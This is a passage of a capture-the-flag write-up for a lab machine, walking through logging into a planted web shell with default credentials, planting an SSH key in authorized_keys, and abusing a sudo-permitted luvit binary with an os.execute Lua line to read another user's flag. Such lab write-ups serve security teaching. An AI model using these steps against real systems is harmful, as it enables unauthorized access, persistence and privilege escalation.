Web Shell Exploitation

Heading over to 10.10.10.181/smevk.php we can see its prompting us for login. Checking the smevk.php file that we downloaded, we can see the default creds are admin:admin. Entering these gives us backdoor access to the server.

Screenshot_20200403_024019.png

Exploring through the system we find out that we have access to /home/webadmin/.ssh/ folder; that being the case, we can upload our public ssh key into authorized_keys to get ourselves a proper secure shell.

Screenshot_20200403_024416.png

 

Now we can ssh into the server as webadmin. Doing so, we get greeted with a message of the day.

First things first, running sudo -l to see what we have sudo access too (or specific restrictions)
We find that there is some files we are allowed to run as user sysadmin with no password on the file /home/sysadmin/luvit.

Screenshot_20200403_024949.png

after reading that, we ls the current directory to find there also is a note. After reading that we now know we can test lua files using the luvit program inside of /home/sysadmin/luvit and we can execute the program as sysadmin. Great! this is our route to user.

we will make a file called kss.lua and inside, put:

os.execute("cat /home/sysadmin/user.txt")

and then execute the file by running:

sudo -u sysadmin /home/sysadmin/luvit kss.lua

This prints out the user flag, we have gained used access